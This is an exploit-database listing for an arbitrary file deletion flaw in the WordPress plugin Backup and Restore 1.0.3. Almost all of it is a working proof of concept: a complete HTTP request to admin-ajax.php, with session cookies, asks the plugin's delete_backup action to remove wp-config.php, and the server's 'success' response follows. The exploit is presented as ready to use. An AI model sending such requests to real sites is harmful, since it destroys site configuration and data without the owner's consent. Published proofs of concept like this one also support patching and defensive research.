Exploit WordPress Backup And Restore 1.0.3 Arbitrary File Deletion

Name: WordPress Backup And Restore 1.0.3 Arbitrary File Deletion
Rating: 5 (122 reviews)
2021-11-08 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:164798
# Exploit Title: WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion  
# Date: 11/07/2021  
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)  
# Vendor Homepage: https://www.miniorange.com/  
# Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/  
# Version: 1.0.3  
# Tested on : Windows 10  
  
#Poc:  
  
----------------------------------REQUEST---------------------------------------  
  
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 155  
Origin: http://localhost  
Connection: close  
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce  
  
  
----------------------------------------------------------------------------------  
  
  
  
-------------------------------RESPONSE-------------------------------------------  
  
HTTP/1.1 200 OK  
Date: Sun, 07 Nov 2021 13:19:38 GMT  
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7  
X-Powered-By: PHP/8.0.7  
Access-Control-Allow-Origin: http://localhost  
Access-Control-Allow-Credentials: true  
X-Robots-Tag: noindex  
X-Content-Type-Options: nosniff  
Expires: Wed, 11 Jan 1984 05:00:00 GMT  
Cache-Control: no-cache, must-revalidate, max-age=0  
X-Frame-Options: SAMEORIGIN  
Referrer-Policy: strict-origin-when-cross-origin  
Content-Length: 9  
Connection: close  
Content-Type: application/json; charset=UTF-8  
  
"success"  
  
----------------------------------------------------------------------------------